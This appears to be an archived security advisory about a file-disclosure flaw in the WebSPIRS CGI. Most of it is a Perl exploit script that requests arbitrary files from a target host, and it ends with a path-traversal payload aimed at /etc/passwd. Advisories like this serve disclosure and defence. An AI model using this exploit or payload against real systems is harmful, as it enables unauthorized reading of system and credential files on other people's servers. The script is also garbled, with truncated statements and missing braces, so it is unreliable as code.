

    WebSPIRS CGI 3.1 (at least)


    Following is based on a  UkR security team advisory #1.   WebSPIRS
    is SilverPlatter's Information Retrieval System for the World Wide
    Web (WWW).   It is  a common  gateway interface  (CGI) application
    which  allows  any  forms-capable  browser,  such  as Netscape, to
    search  SilverPlatter  (SP)  Electronic  Reference  Library  (ERL)
    databases available over the Internet.

    Problem lyes in incorrect validation of user  submitted-by-browser
    information, that  can show  any file  of the  system where script
    installed.  Exploit:

    Exploit code:

    #  Remote Script to exploit bug in webspirs.cgi
    #  Affected systems: any where webspirs.cgi are installed
    #  Using by default "/"
    #  Spain 10-3-2001  (Crono) (
    use LWP::UserAgent;
    use Socket;
    use Getopt::Std;
    getopts("h:v:c:", \%args);
    if (!defined $args{h}, !defined $args{v}) {
    print qq~
                    -=- WebSpirs Remote Script -=-
                              by Crono
        Usage: perl -h <host> -v <file>
    if (defined $args{h}, $args{v}){
    &conectar; }
    sub conectar   {
    print " - WebSpirs Remote Script Facility -             -=- By Crono
    print "\nAttemtping to get: $v\n";
    my $server = inet_ntoa(inet_aton($host));
    my $url = "/cgi-bin/webspirs.cgi?sp.nextform=".
    my $ua = new LWP::UserAgent;
    my $req = new HTTP::Request GET =>
    my $res = $ua->request($req);
    my $web = $res->server;
    my $code = $res->code;
    my $content = $res->content;
    print "$web\t$code\n";
    print "$content\n";


    Wen you  try this  with WebSpirs  4.2 it  says, Security Violation
    Detected, Contact  your Systems  Administrator..   In WebSpirs 4.2
    the way we have it is, URL/dbname?sp.nextform=blah/blah/blah.  Now
    if you switch the dbname  with webspirs.cgi it comes back  with no
    data..  Using it as the  dbname?sp.nextform=../../../../etc/passwd
    gives a security violation message.